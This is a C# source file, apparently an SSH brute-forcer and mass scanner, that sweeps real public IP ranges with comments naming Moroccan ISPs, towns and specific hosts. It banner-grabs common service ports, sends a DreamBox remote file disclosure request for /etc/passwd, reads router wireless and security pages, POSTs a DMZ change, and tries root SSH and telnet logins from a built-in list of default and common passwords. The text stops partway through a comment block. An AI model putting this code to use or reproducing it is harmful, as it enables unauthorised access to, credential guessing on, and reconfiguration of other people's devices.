scanner ssh

1. using System;
2. using System.Collections; //ArrayList
3. using System.Collections.Generic;
4. using System.IO;
5. using System.Linq;
6. using System.Text;
7. using System.Threading;
8.  
9. using System.Net.Sockets;
10. using System.Net;
11.  
12. using Tamir.SharpSsh;
13.  
14. //TODO: http://nion.modprobe.de/blog/archives/704-Exploiting-the-UbiquisysSFR-femtocell-webserver-wsalshttpdmongooseyassl-embedded-webserver.html
15. //JA
16. namespace sshbruteforcer
17. {
18. public static class IPAddressMask
19. {
20. private static void CheckIPVersion(IPAddress ipAddress, IPAddress mask, out byte[] addressBytes, out byte[] maskBytes)
21. {
22. if (mask == null)
23. {
24. throw new ArgumentException();
25. }
26.  
27. addressBytes = ipAddress.GetAddressBytes();
28. maskBytes = mask.GetAddressBytes();
29.  
30. if (addressBytes.Length != maskBytes.Length)
31. {
32. throw new ArgumentException("The address and mask don't use the same IP standard");
33. }
34. }
35.  
36. public static IPAddress And(this IPAddress ipAddress, IPAddress mask)
37. {
38. byte[] addressBytes;
39. byte[] maskBytes;
40. CheckIPVersion(ipAddress, mask, out addressBytes, out maskBytes);
41.  
42. byte[] resultBytes = new byte[addressBytes.Length];
43. for (int i = 0; i < addressBytes.Length; ++i)
44. {
45. resultBytes[i] = (byte)(addressBytes[i] & maskBytes[i]);
46. }
47.  
48. return new IPAddress(resultBytes);
49. }
50.  
51. private static IPAddress empty = IPAddress.Parse("0.0.0.0");
52. private static IPAddress intranetMask1 = IPAddress.Parse("10.255.255.255");
53. private static IPAddress intranetMask2 = IPAddress.Parse("172.16.0.0");
54. private static IPAddress intranetMask3 = IPAddress.Parse("172.31.255.255");
55. private static IPAddress intranetMask4 = IPAddress.Parse("192.168.255.255");
56. /// <summary>
57. /// Retuns true if the ip address is one of the following
58. /// IANA-reserved private IPv4 network ranges (from http://en.wikipedia.org/wiki/IP_address)
59. /// Start End
60. /// 10.0.0.0 10.255.255.255
61. /// 172.16.0.0 172.31.255.255
62. /// 192.168.0.0 192.168.255.255
63. /// </summary>
64. /// <returns></returns>
65. public static bool IsOnIntranet(this IPAddress ipAddress)
66. {
67. if (empty.Equals(ipAddress))
68. {
69. return false;
70. }
71. bool onIntranet = IPAddress.IsLoopback(ipAddress);
72. onIntranet = onIntranet || ipAddress.Equals(ipAddress.And(intranetMask1)); //10.255.255.255
73. onIntranet = onIntranet || ipAddress.Equals(ipAddress.And(intranetMask4)); ////192.168.255.255
74.  
75. onIntranet = onIntranet || (intranetMask2.Equals(ipAddress.And(intranetMask2))
76. && ipAddress.Equals(ipAddress.And(intranetMask3)));
77.  
78. return onIntranet;
79. }
80. }
81.  
82. public class Program //(string ipaddress)
83. {
84. // public Socket Sock_scan;
85.  
86.  
87. static Byte[] m_byBuff = new Byte[32767];
88.  
89. int Max_thread=50;
90.  
91. private static AsyncCallback callbackProc ;
92. private static ArrayList m_ListOptions = new ArrayList();
93. static Char IAC = Convert.ToChar(255);
94. static Char DO = Convert.ToChar(253);
95. static Char DONT = Convert.ToChar(254);
96. static Char WILL = Convert.ToChar(251);
97. static Char WONT = Convert.ToChar(252);
98. static Char SB = Convert.ToChar(250);
99. static Char SE = Convert.ToChar(240);
100.  
101. // ManualResetEvent instances signal completion.
102. private static ManualResetEvent connectDone =
103. new ManualResetEvent(false);
104. private static ManualResetEvent sendDone =
105. new ManualResetEvent(false);
106. private static ManualResetEvent receiveDone =
107. new ManualResetEvent(false);
108. // The response from the remote device.
109. private static String response = String.Empty;
110.  
111. public static Compteur_thread cpt_th = new Compteur_thread();
112.  
113.  
114.  
115.  
116. string ipaddress;
117. int portx;
118.  
119. //public static IPAddress address = IPAddress.Parse("10.20.10.5");
120. //bool onTheIntranet = address.IsOnIntranet();
121.  
122.  
123. public Program(string ipaddress, int portx)
124. {
125. this.ipaddress = ipaddress;
126. this.portx = portx;
127. //this.cpt_th = new Compteur_thread();
128. }
129.  
130. public static void Main(string[] args)
131. {
132. Program p1 = new Program("go",5);
133. //p1.go();
134. Thread th_Scan_ip_port = new Thread(new ThreadStart(p1.go));
135. th_Scan_ip_port.Start();
136. }
137.  
138. public void go()
139. {
140. // CScanner_IP s;
141. // s = new CScanner_IP("41.250.149.1", "41.250.149.254", 21, 25);
142.  
143.  
144. byte[] t_IP_start;
145. byte[] t_IP_end;
146.  
147. // IPAddress MyExternalIp = GetExternalIp();
148. // Console.WriteLine("MyExternalIp=" + MyExternalIp);
149. // string[] s_ip = MyExternalIp.ToString().Split('.');
150. // string[] s2_ip = MyExternalIp.ToString().Split('.');
151.  
152. string adresse_en_cours;
153.  
154.  
155. int Port_start=22;
156. int Port_end=23;
157.  
158.  
159.  
160.  
161. Thread th_Lance_Scan;
162. Thread th_Scan_ip_port;
163.  
164.  
165. cpt_th.lancer_thread += new Program.Compteur_thread.Lancer_Thread(Lancer_Thread);
166.  
167. //Decoupe IP debut
168. //196.28.249.--- Burkina Faso
169. //41.202.193.--- Cameroun
170. //195.24.206.--- Cameroun
171. //90.4.125.--- France
172. //202.152.43.--- Indonésie
173. //202.159.126.--- Indonésie
174.  
175. //http://www.programva.com/en/list-of-ip-addresses-world-countries?user_0=%20Morocco%20MA%20MAR&user_a=ip%20addresses:%20&user_b=list%20of%20ip%20address&id_r=138&opEvent=country&opEventChild=
176.  
177. //41.214
178. string[] s_ip = { "41", "141", "1", "1" }; //zawi 41.250.195.107
179. //string[] s_ip={"41", "250", "75", "1"}; //zawi 41.250.195.107
180. //string[] s_ip = { "81", "192", "102", "1" }; //Maroc telecom ip fixe 81.192.102.8: netpeas 81.192.152.205: cnia
181. //41.248.0
182. //41.248.158.92
183. //string[] s_ip = { "41", "141", "235", "1" }; //example: 41.141.235.82
184. //41.141.55.16 Agadir
185. //41.143.11.192
186. //41.250.59.57
187. //41.250.118.53
188. //41.250.129.142
189. //string[] s_ip = { "41", "250", "82", "159" }; //example: 41.250.82.159
190. // string[] s_ip = { "196", "12", "232", "1" }; //196.12.232.120 <snip> location
191. //196.206.198.10 Rabat
192. //string[] s_ip = { "41", "250", "136", "1" }; //<snip> location 41.250.136.238
193. //string[] s_ip = { "41", "250", "150", "18" };
194. //string[] s_ip = { "41", "250", "195", "1"}; //zawi 41.250.195.107
195. //string[] s_ip = { "41", "251", "16", "1" }; //<snip> location 41.251.16.238
196. //string[] s_ip = { "91", "121", "78", "55" }; //OVH 91.121.78.55
197. //http://www.robtex.com/dns/adsl.iam.net.ma.html#records
198. //string[] s_ip = { "196", "217", "240", "1" }; //MENARA (mail)
199. //string[] s_ip = { "81", "192", "48", "1" }; //MENARA (dns)
200. //string[] s_ip = { "212", "217", "0", "1" }; //MENARA
201.  
202. t_IP_start = new byte[4];
203. // for (int i = 0; i < s_ip.Length; i++)
204. // t_IP_start[i] = Convert.ToByte(s_ip[i]);
205. t_IP_start[0] = Convert.ToByte(s_ip[0]);
206. t_IP_start[1] = Convert.ToByte(s_ip[1]);
207. t_IP_start[2] = Convert.ToByte(s_ip[2]);
208. t_IP_start[3] = Convert.ToByte(s_ip[3]);
209. //t_IP_start[3] = Convert.ToByte("1");
210.  
211. //string[] s2_ip={"41", "250", "149", "254"}; //zawi
212. // string[] s2_ip={"41", "251", "254", "254"}; //zawi
213. string[] s2_ip = { "196", "12", "233", "255" }; //196.12.232.120 <snip> location
214. //string[] s2_ip = { "41", "251", "16", "254" }; //<snip> location 41.251.35.72
215. //string[] s2_ip = { "41", "141", "235", "254" }; //<snip> location 41.141.235.82
216. //string[] s2_ip = { "91", "121", "78", "55" }; //OVH 91.121.78.55
217. // string[] s2_ip = { "41", "250", "150", "19" };
218. //string[] s2_ip = { "196", "217", "255", "255" }; //MENARA (mail)
219. //string[] s2_ip = { "81", "192", "63", "255" }; //MENARA (dns)
220. //string[] s2_ip = { "212", "217", "31", "255" }; //MENARA
221.  
222. t_IP_end = new byte[4];
223. // for (int i = 0; i < s_ip.Length; i++)
224. // t_IP_end[i] = Convert.ToByte(s2_ip[i]);
225. t_IP_end[0] = Convert.ToByte(s2_ip[0]);
226. t_IP_end[1] = Convert.ToByte(s2_ip[1]);
227. t_IP_end[2] = Convert.ToByte(s2_ip[2]);
228. t_IP_end[3] = Convert.ToByte(s2_ip[3]);
229. //t_IP_end[3] = Convert.ToByte("255");
230.  
231. // private void Lancer_Scan()
232. // {
233. int i=0, j=0, k=0, l=0;
234. int max_j=0, max_k=0, max_l=0;
235. bool start_j = true;
236. bool start_k = true;
237. bool start_l = true;
238.  
239. try
240. {
241.  
242. // Info_Scan infs = new Info_Scan(IP_start, IP_end, Port, "Debut du scan", "");
243. //Console.WriteLine("Debut du scan");
244. // if(init_scan != null)init_scan(this, infs);
245.  
246. for(i = t_IP_start[0];i <= t_IP_end[0]; i++)
247. {
248. if((start_j) && (t_IP_start[0] != t_IP_end[0]))
249. {
250. j = t_IP_start[1];
251. max_j = 255;
252. }
253. if((start_j) && (t_IP_start[0] == t_IP_end[0]))
254. {
255. j = t_IP_start[1];
256. max_j = t_IP_end[1];
257. }
258.  
259. if((!start_j) && (i != t_IP_end[0]))
260. {
261. j = 0;
262. max_j = 255;
263. }
264. if((!start_j) && (i == t_IP_end[0]))
265. {
266. j = 0;
267. max_j = t_IP_end[1];
268. }
269.  
270. for( ;j <= max_j; j++)
271. {
272.  
273. if((start_k) && (t_IP_start[1] != t_IP_end[1]))
274. {
275. k = t_IP_start[2];
276. max_k = 255;
277. }
278. if((start_k) && (t_IP_start[1] == t_IP_end[1]))
279. {
280. k = t_IP_start[2];
281. max_k = t_IP_end[2];
282. }
283.  
284. if((!start_k) && (j != t_IP_end[1]))
285. {
286. k = 0;
287. max_k = 255;
288. }
289. if((!start_k) && (j == t_IP_end[1]))
290. {
291. k = 0;
292. max_k = t_IP_end[2];
293. }
294.  
295. for( ;k <= max_k; k++)
296. {
297.  
298. if((start_l) && (t_IP_start[2] != t_IP_end[2]))
299. {
300. l = t_IP_start[3];
301. max_l = 255;
302. }
303. if((start_l) && (t_IP_start[2] == t_IP_end[2]))
304. {
305. l = t_IP_start[3];
306. max_l = t_IP_end[3];
307. }
308.  
309. if((!start_l) && (k != t_IP_end[2]))
310. {
311. l = 0;
312. max_l = 255;
313. }
314. if((!start_l) && (k == t_IP_end[2]))
315. {
316. l = 0;
317. max_l = t_IP_end[3];
318. }
319.  
320. for( ;l <= max_l; l++)
321. {
322. adresse_en_cours = i.ToString() + "." + j.ToString() + "." + k.ToString() + "." + l.ToString();
323.  
324. // Info_Scan info = new Info_Scan(adresse_en_cours, Port, "starting to scan", "");
325. // Console.WriteLine("DEBUG Current IP: {0}",adresse_en_cours);
326.  
327. // if(debut_scan != null)
328. // debut_scan(this, info);
329.  
330. /*
331. Scanner_ip_port sc = new Scanner_ip_port(adresse_en_cours, Port, this, cpt_th);
332. */
333. int nb_thread = 0;
334. for (int port = Port_start; port <= Port_end; port++)
335. {
336. /*
337. Scanner_IP_Port(adresse_en_cours, port);
338. th_Scan_ip_port = new Thread(new ThreadStart(Scanner_IP_Port));
339. th_Scan_ip_port.Name = adresse_en_cours + ":" + Port.ToString();
340. th_Scan_ip_port.Start();
341. */
342.  
343. Scanner_ip_port sc = new Scanner_ip_port(adresse_en_cours, port, cpt_th);
344.  
345. Thread t = new Thread(new ThreadStart(sc.Scanner_IP_Port));
346. t.Start();
347.  
348. cpt_th.Incrementer();
349. nb_thread = 0;
350. cpt_th.Nb_thread(out nb_thread);
351. if (nb_thread == this.Max_thread)
352. {
353. lock (this)
354. {
355. // Console.WriteLine("DEBUG WAIT1");
356. Monitor.Wait(this);
357. }
358. }
359. }
360.  
361. //http scan
362.  
363. Scanner_ip_port sc2 = new Scanner_ip_port(adresse_en_cours, 80, cpt_th);
364.  
365. Thread t2 = new Thread(new ThreadStart(sc2.Scanner_IP_Port));
366. t2.Start();
367.  
368. cpt_th.Incrementer();
369. nb_thread = 0;
370. cpt_th.Nb_thread(out nb_thread);
371. if (nb_thread == this.Max_thread)
372. {
373. lock (this)
374. {
375. // Console.WriteLine("DEBUG WAIT2");
376. Monitor.Wait(this);
377. }
378. }
379.  
380.  
381. //https scan
382.  
383. Scanner_ip_port sc3 = new Scanner_ip_port(adresse_en_cours, 443, cpt_th);
384.  
385. Thread t3 = new Thread(new ThreadStart(sc3.Scanner_IP_Port));
386. t3.Start();
387.  
388. cpt_th.Incrementer();
389. nb_thread = 0;
390. cpt_th.Nb_thread(out nb_thread);
391. if (nb_thread == this.Max_thread)
392. {
393. lock (this)
394. {
395. //Console.WriteLine("DEBUG WAIT2");
396. Monitor.Wait(this);
397. }
398. }
399.  
400. //VIDEO H.323 scan : ref.: HD MOORE (Rapid7)
401. Scanner_ip_port sc1720 = new Scanner_ip_port(adresse_en_cours, 1720, cpt_th);
402.  
403. Thread t1720 = new Thread(new ThreadStart(sc1720.Scanner_IP_Port));
404. t1720.Start();
405.  
406. cpt_th.Incrementer();
407. nb_thread = 0;
408. cpt_th.Nb_thread(out nb_thread);
409. if (nb_thread == this.Max_thread)
410. {
411. lock (this)
412. {
413. //Console.WriteLine("DEBUG WAIT2");
414. Monitor.Wait(this);
415. }
416. }
417.  
418.  
419. //RDP scan
420. Scanner_ip_port sc3389 = new Scanner_ip_port(adresse_en_cours, 3389, cpt_th);
421.  
422. Thread t3389 = new Thread(new ThreadStart(sc3389.Scanner_IP_Port));
423. t3389.Start();
424.  
425. cpt_th.Incrementer();
426. nb_thread = 0;
427. cpt_th.Nb_thread(out nb_thread);
428. if (nb_thread == this.Max_thread)
429. {
430. lock (this)
431. {
432. //Console.WriteLine("DEBUG WAIT2");
433. Monitor.Wait(this);
434. }
435. }
436.  
437. /*
438. sc.scan_en_cours += new Scanner_IP.Scanner_ip_port.Scan_en_cours(Ev_scan_en_cours);
439. th_Scan_ip_port = new Thread(new ThreadStart(sc.Scanner_IP_Port));
440. th_Scan_ip_port.Name = adresse_en_cours + ":" + Port.ToString();
441. th_Scan_ip_port.Start();
442.  
443. cpt_th.Incrementer();
444. int nb_thread = 0;
445. cpt_th.Nb_thread(out nb_thread);
446. */
447.  
448. /*
449. if((this.i_progress == this.pas_a_atteindre) && (this.i_progress <= this._ECART_IP_))
450. {
451. Info_Scan ifs = new Info_Scan(adresse_en_cours, Port, "", "", (int)(this.pct_progress * 100));
452. if(this.maj_prg_bar != null)
453. this.maj_prg_bar(this, ifs);
454.  
455. this.pas_a_atteindre += this.pas_progress;
456. }
457.  
458. i_progress++;
459. */
460.  
461. /*
462. if(nb_thread == this.Max_thread)
463. {
464. lock(this)
465. {
466. Monitor.Wait(this);
467. }
468.  
469. if(this.ARRETER_SCAN)
470. {
471. Info_Scan inf_s = new Info_Scan("", 0, "", "Arrêt du scan");
472. if(fin_scan != null)fin_scan(this, inf_s);
473.  
474. return;
475. }
476. }
477. */
478. }
479. start_l = false;
480. }
481. start_k = false;
482. }
483. start_j = false;
484. }
485.  
486. // Info_Scan inf = new Info_Scan("", 0, "", "Fin du scan");
487. // if(fin_scan != null)fin_scan(this, inf);
488. }
489. catch(Exception e)
490. {
491. Console.WriteLine("BADBOY: "+e.ToString());
492. }
493. // }
494.  
495.  
496.  
497.  
498.  
499. }
500.  
501. public class Scanner_ip_port
502. {
503. string adresse_ip;
504. int port;
505.  
506. Compteur_thread cpt_th;
507.  
508.  
509.  
510.  
511. public Scanner_ip_port(string adresse_ip, int port, Compteur_thread cpt_th)
512. {
513. this.adresse_ip = adresse_ip;
514. this.port = port;
515. this.cpt_th = cpt_th;
516. }
517.  
518. public void Scanner_IP_Port()
519. {
520. try
521. {
522. // Console.WriteLine("DEBUG SCANNING: " + adresse_ip.ToString());
523.  
524. IPAddress adresseIP = IPAddress.Parse(adresse_ip);
525. IPEndPoint ip = new IPEndPoint(adresseIP, port);
526. Socket Sock_scan = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
527. //Sock_scan.Blocking = false;
528. // Connect to the remote endpoint.
529. Sock_scan.Connect(ip);
530. /*asynchronous
531. try
532. {
533. Sock_scan.BeginConnect(ip, new AsyncCallback(ConnectCallback), Sock_scan);
534. }
535. catch (Exception e)
536. {
537. Console.WriteLine("DEBUG BEGINCONNECT: "+e);
538. }
539. Console.WriteLine("DEBUG RACHEL");
540. connectDone.WaitOne(1000);
541. asynchronous*/
542.  
543. // Info_Scan info = new Info_Scan(adresse_ip, port, "Port ouvert", "", ind, Resultat_Scan.reussite);
544. Console.WriteLine("{0} -> Port {1} open", adresse_ip, port);
545. // if (scan_en_cours != null) scan_en_cours(this, info);
546.  
547.  
548. /*
549. Byte[] RecvBytes = new Byte[256];
550. String strRetPage = null;
551. Int32 bytes = Sock_scan.Receive(RecvBytes, RecvBytes.Length, 0);
552. Encoding ASCII = Encoding.ASCII;
553. strRetPage = strRetPage + ASCII.GetString(RecvBytes, 0, bytes);
554.  
555. while (bytes > 0)
556. {
557. bytes = Sock_scan.Receive(RecvBytes, RecvBytes.Length, 0);
558. strRetPage = ASCII.GetString(RecvBytes, 0, bytes);
559. }
560. Console.WriteLine(strRetPage);
561. */
562. byte[] data = new byte[4096];
563. string banner;
564. int recv;
565. /*
566. NetworkStream ns = new NetworkStream(Sock_scan);
567. if (ns.CanRead)
568. {
569. recv = ns.Read(data, 0, data.Length);
570. stringData = Encoding.ASCII.GetString(data, 0, recv);
571. Console.WriteLine("== BANNER START =======================");
572. Console.WriteLine(stringData);
573. Console.WriteLine("== BANNER END =======================");
574. }
575. else
576. {
577. Console.WriteLine("Error: Can't read from this socket");
578. ns.Close();
579. // server.Close();
580. // return;
581. }
582. */
583.  
584. // Receive the response from the remote device.
585. /*synchro*/
586. recv = Sock_scan.Receive(data);
587. banner = Encoding.ASCII.GetString(data, 0, recv);
588. Console.WriteLine("{0}:{1} -> BANNER01: " + banner, adresse_ip, port);
589.  
590. if (banner == "")
591. {
592. recv = Sock_scan.Receive(data);
593. banner = Encoding.ASCII.GetString(data, 0, recv);
594. Console.WriteLine("{0}:{1} -> BANNER02: " + banner, adresse_ip, port);
595. }
596.  
597. /*synchro*/
598.  
599. /*asynchro
600. Receive(Sock_scan);
601. receiveDone.WaitOne(1000);
602. // Write the response to the console.
603. Console.WriteLine("Response received : {0}", response);
604. banner = response;
605. asynchro*/
606.  
607.  
608.  
609.  
610.  
611.  
612.  
613. if (port == 21)
614. {
615. Sock_scan.Close();
616. // ftptry(adresse_ip);
617. }
618. if (port == 22)
619. {
620. Sock_scan.Close();
621. // sshtry(adresse_ip);
622. }
623. if (port == 23)
624. {
625. if (banner.Contains("ogin:") || banner.Contains("assword:") || banner.Contains("Connection was denied by remote host according to ACL!"))
626. {
627.  
628. }
629. else
630. {
631. recv = Sock_scan.Receive(data);
632. banner = Encoding.ASCII.GetString(data, 0, recv);
633. Console.WriteLine("{0}:{1} -> BANNER03: " + banner, adresse_ip, port);
634. if (banner.Contains("ogin:") || banner.Contains("assword:"))
635. {
636.  
637. }
638. else
639. {
640. recv = Sock_scan.Receive(data);
641. banner = Encoding.ASCII.GetString(data, 0, recv);
642. Console.WriteLine("{0}:{1} -> BANNER04: " + banner, adresse_ip, port);
643. }
644. }
645. Sock_scan.Close();
646. if (banner.Contains("Connection was denied by remote host according to ACL!"))
647. {
648.  
649. }
650. else
651. {
652. telnettry(adresse_ip, banner);
653. }
654. }
655. if (port == 80)
656. {
657. string ResponseText = "";
658. StreamReader SR = null;
659. HttpWebResponse response = null;
660. HttpWebRequest request;
661. request = (HttpWebRequest)HttpWebRequest.Create("http://"+adresse_ip+"/password.cgi");
662. //ServicePointManager.ServerCertificateValidationCallback = new System.Net.Security.RemoteCertificateValidationCallback(ValidateServerCertificate);
663.  
664. request.Method = "GET";
665. //request.ContentType = "application/xml";
666.  
667. response = (HttpWebResponse)request.GetResponse();
668. SR = new StreamReader(response.GetResponseStream());
669. ResponseText = SR.ReadToEnd();
670.  
671. Console.WriteLine(string.Format("password.cgi response status : [{0}]", response.StatusCode + " - " + response.StatusDescription));
672. Console.WriteLine(string.Format("password.cgi response headers : [{0}]", response.Headers.ToString()));
673. Console.WriteLine(string.Format("password.cgi response received : [{0}]", ResponseText));
674.  
675. //***********************************************************************************************************************************************
676. //DreamBox DM800 <= 1.5rc1 Remote File Disclosure Exploit
677. //http://www.exploit-db.com/exploits/18079/
678. request = (HttpWebRequest)HttpWebRequest.Create("http://" + adresse_ip + "/file?file=/etc/passwd");
679. //ServicePointManager.ServerCertificateValidationCallback = new System.Net.Security.RemoteCertificateValidationCallback(ValidateServerCertificate);
680.  
681. request.Method = "GET";
682. //request.ContentType = "application/xml";
683.  
684. response = (HttpWebResponse)request.GetResponse();
685. SR = new StreamReader(response.GetResponseStream());
686. ResponseText = SR.ReadToEnd();
687.  
688. Console.WriteLine(string.Format("DreamBox RFI response status : [{0}]", response.StatusCode + " - " + response.StatusDescription));
689. Console.WriteLine(string.Format("DreamBox RFI response headers : [{0}]", response.Headers.ToString()));
690. Console.WriteLine(string.Format("DreamBox RFI response received : [{0}]", ResponseText));
691.  
692.  
693. //***********************************************************************************************************************************************
694. //108M Wireless ADSL2+ Router
695. //http://41.250.9.119/wlcfg.html //Wireless/Basic
696. //http://41.250.9.119/wlsecurity.html //Wireless/Security
697.  
698. request = (HttpWebRequest)HttpWebRequest.Create("http://" + adresse_ip + "/wlcfg.html");
699. //ServicePointManager.ServerCertificateValidationCallback = new System.Net.Security.RemoteCertificateValidationCallback(ValidateServerCertificate);
700.  
701. request.Method = "GET";
702. //request.ContentType = "application/xml";
703.  
704. response = (HttpWebResponse)request.GetResponse();
705. SR = new StreamReader(response.GetResponseStream());
706. ResponseText = SR.ReadToEnd();
707.  
708. Console.WriteLine(string.Format("wlcfg.html response status : [{0}]", response.StatusCode + " - " + response.StatusDescription));
709. Console.WriteLine(string.Format("wlcfg.html response headers : [{0}]", response.Headers.ToString()));
710. Console.WriteLine(string.Format("wlcfg.html response received : [{0}]", ResponseText));
711. //***********************************************************************************************************************************************
712. request = (HttpWebRequest)HttpWebRequest.Create("http://" + adresse_ip + "/wlsecurity.html");
713. //ServicePointManager.ServerCertificateValidationCallback = new System.Net.Security.RemoteCertificateValidationCallback(ValidateServerCertificate);
714.  
715. request.Method = "GET";
716. //request.ContentType = "application/xml";
717.  
718. response = (HttpWebResponse)request.GetResponse();
719. SR = new StreamReader(response.GetResponseStream());
720. ResponseText = SR.ReadToEnd();
721.  
722. Console.WriteLine(string.Format("wlsecurity.html response status : [{0}]", response.StatusCode + " - " + response.StatusDescription));
723. Console.WriteLine(string.Format("wlsecurity.html response headers : [{0}]", response.Headers.ToString()));
724. Console.WriteLine(string.Format("wlsecurity.html response received : [{0}]", ResponseText));
725. //***********************************************************************************************************************************************
726. //http://41.250.9.119/scdmz.html //DMZ
727. request = (HttpWebRequest)HttpWebRequest.Create("http://" + adresse_ip + "/scdmz.html?address=192.168.1.2"); //dmzAddr
728. //ServicePointManager.ServerCertificateValidationCallback = new System.Net.Security.RemoteCertificateValidationCallback(ValidateServerCertificate);
729.  
730. request.Method = "POST";
731. //request.ContentType = "application/xml";
732.  
733. string postData = "address=192.168.1.2";
734. byte[] byteArray = Encoding.UTF8.GetBytes(postData);
735. request.ContentLength = byteArray.Length;
736.  
737. Stream dataStream = request.GetRequestStream();
738. dataStream.Write(byteArray, 0, byteArray.Length);
739. dataStream.Close();
740.  
741. response = (HttpWebResponse)request.GetResponse();
742. SR = new StreamReader(response.GetResponseStream());
743. ResponseText = SR.ReadToEnd();
744.  
745. Console.WriteLine(string.Format("scdmz.html response status : [{0}]", response.StatusCode + " - " + response.StatusDescription));
746. Console.WriteLine(string.Format("scdmz.html response headers : [{0}]", response.Headers.ToString()));
747. Console.WriteLine(string.Format("scdmz.html response received : [{0}]", ResponseText));
748.  
749.  
750. }
751.  
752. cpt_th.Decrementer();
753.  
754. //Console.WriteLine("End of scan, stop to drink b33rz dude - " + adresse_ip.ToString());
755. }
756. catch (Exception e)
757. {
758. /*
759. Info_Scan info = new Info_Scan(adresse_ip, port, "Closed Port", "", ind, Resultat_Scan.echec);
760. if (scan_en_cours != null) scan_en_cours(this, info);
761. */
762. cpt_th.Decrementer();
763. // Console.WriteLine("DEBUG {0} -> Port {1} closed", adresse_ip, port);
764. // Console.WriteLine("EXCEPT: " + e);
765. }
766. }
767. }
768.  
769. static List<string> passwords = new List<string>
770. {
771. "admin",
772. "1234",
773. "cisco",
774. "",
775. "Admin",
776. "root",
777. "toor",
778. "default",
779. "azerty",
780. "qwerty",
781. "12345",
782. "123456",
783. "1234567",
784. "12345678",
785. "dreambox",
786. "test",
787. "user",
788. "demo",
789. "ZXDSL",
790. "password",
791. "agadir",
792. "menara",
793. "Menara",
794. "maroc",
795. "vodafone",
796. "epicrouter", //conexant telnet
797. //http://www.itscolumn.com/2011/11/25-password-that-you-should-not-use-not-for-any-accounts/
798. "abc123",
799. "monkey",
800. "letmein",
801. "trustno1",
802. "dragon",
803. "baseball",
804. "111111",
805. "iloveyou",
806. "master",
807. "sunshine",
808. "ashley",
809. "bailey",
810. "passw0rd",
811. "shadow",
812. "123123",
813. "654321",
814. "superman",
815. "qazwsx",
816. "michael",
817. "football"
818. //123123
819. };
820.  
821. public static void sshtry(string myip)
822. {
823. Console.WriteLine("sshtry");
824. // sshtry("test");
825. foreach (string password in passwords)
826. {
827. try
828. {
829. Console.Write("-Connecting...");
830. SshStream ssh = new SshStream(myip, "root", password);
831. Console.WriteLine("{0} -> SSH PASSWORD IS: {1}\n", myip, password);
832. Console.WriteLine("OK ({0}/{1})", ssh.Cipher, ssh.Mac);
833. Console.WriteLine("Server version={0}, Client version={1}", ssh.ServerVersion, ssh.ClientVersion);
834. Console.WriteLine("-Use the 'exit' command to disconnect.");
835. Console.WriteLine();
836.  
837. //Sets the end of response character
838. ssh.Prompt = "#";
839. //Remove terminal emulation characters
840. ssh.RemoveTerminalEmulationCharacters = true;
841.  
842. //Reads the initial response from the SSH stream
843. // Console.Write(ssh.ReadResponse());
844.  
845.  
846.  
847. ////Send commands from the user
848. //while (true)
849. //{
850. // string command = Console.ReadLine();
851. // if (command.ToLower().Equals("exit"))
852. // break;
853.  
854. // //Write command to the SSH stream
855. // ssh.Write(command);
856. // //Read response from the SSH stream
857. // Console.Write(ssh.ReadResponse());
858. //}
859. ssh.Close(); //Close the connection
860. Console.WriteLine("Connection closed.");
861. }
862. catch (Exception e)
863. {
864. string response = string.Empty;
865. response = e.Message;
866. if (response == "Auth fail")
867. {
868. Console.Write("{0} -> bad ssh password: {1}\n", myip, password);
869. // sshtry("12345");
870. }
871. else
872. {
873. Console.WriteLine("{0} SSH ERROR -> "+e.Message,myip);
874. }
875. }
876. }
877. }
878.  
879. public static void telnettry(string myip, string banner)
880. {
881. Console.WriteLine("telnettry");
882.  
883. Socket Sock_scan;
884.  
885. byte[] data = new byte[1024];
886. string stringdata="";
887. int recv;
888.  
889. //try
890. //{
891.  
892. IPAddress adresseIP = IPAddress.Parse(myip);
893. IPEndPoint ip = new IPEndPoint(adresseIP, 23);
894. // Socket Sock_scan = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
895. //Sock_scan.Blocking = false; // This is a non blocking IO
896.  
897. /*
898. // Assign Callback function to read from Asyncronous Socket
899. callbackProc = new AsyncCallback(ConnectCallback);
900. // Begin Asyncronous Connection
901. Sock_scan.BeginConnect(ip, callbackProc, Sock_scan);
902. */
903.  
904. // Sock_scan.Connect(ip);
905. //recv = Sock_scan.Receive(data);
906. //Console.WriteLine("{0} -> Banner telnet: " + Encoding.ASCII.GetString(data, 0, recv), myip);
907.  
908. //}
909. //catch (Exception eeeee)
910. //{
911. // Console.WriteLine(eeeee.Message);
912. //}
913.  
914. String strRetPage = null;
915. Int32 bytes;
916. Byte[] RecvBytes = new Byte[256];
917. Encoding ASCII = Encoding.ASCII;
918. /*
919. bytes = Sock_scan.Receive(RecvBytes, RecvBytes.Length, 0);
920.  
921. strRetPage = strRetPage + ASCII.GetString(RecvBytes, 0, bytes);
922.  
923. while (bytes > 0)
924. {
925. bytes = Sock_scan.Receive(RecvBytes, RecvBytes.Length, 0);
926. strRetPage = strRetPage + ASCII.GetString(RecvBytes, 0, bytes);
927. }
928. Console.WriteLine("Banner telnet: " + strRetPage);
929. */
930.  
931. if (banner.Contains("ogin:") || banner.Contains("sername:"))
932. {
933. Sock_scan = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
934. Sock_scan.Connect(ip);
935.  
936. recv = Sock_scan.Receive(data);
937. stringdata = Encoding.ASCII.GetString(data, 0, recv);
938. Console.WriteLine("{0} -> BANNERLOGIN: " + stringdata, myip);
939.  
940. #region BANNERS01
941. //Exemple: Vulcan
942. //<BAD SEQUENCE>
943. //Copyright (c) 2001-2003 by Conexant, Inc.
944.  
945. //login: 01
946. //password:
947. //Echec Login
948. //login:
949. //login: 02
950. //password:
951. //Echec Login
952. //login: 03
953. //password:
954. //Echec Login
955. //login:
956. //login: 04
957. //password:
958. //Echec Login
959. //login: 05
960. //password:
961. //Echec Login
962.  
963.  
964. //Perte de la connexion à l'hôte.
965. //</BAD SEQUENCE>
966.  
967. //************************************************************************************
968. // CONEXANT SYSTEMS, INC.
969. // ACCESS RUNNER ADSL CONSOLE PORT 3.21
970.  
971. //LOGON PASSWORD>
972. //(epicrouter)
973. //
974. //
975. // CONEXANT SYSTEMS, INC.
976. // ACCESS RUNNER ADSL CONSOLE PORT 3.21
977.  
978.  
979. // MAIN MENU
980.  
981. // 0. Select VC Adaptor
982. // 1. Display Firmware Version
983. // 2. Password Setup
984. // 3. Connection Status
985. // 4. Network Setup
986. // 5. ADSL Setup
987. // 6. System Maintenance
988.  
989.  
990.  
991.  
992. // S. Save Settings and Reset Unit
993. // R. Reset Without Saving Changes
994. // Q. Quit Session
995.  
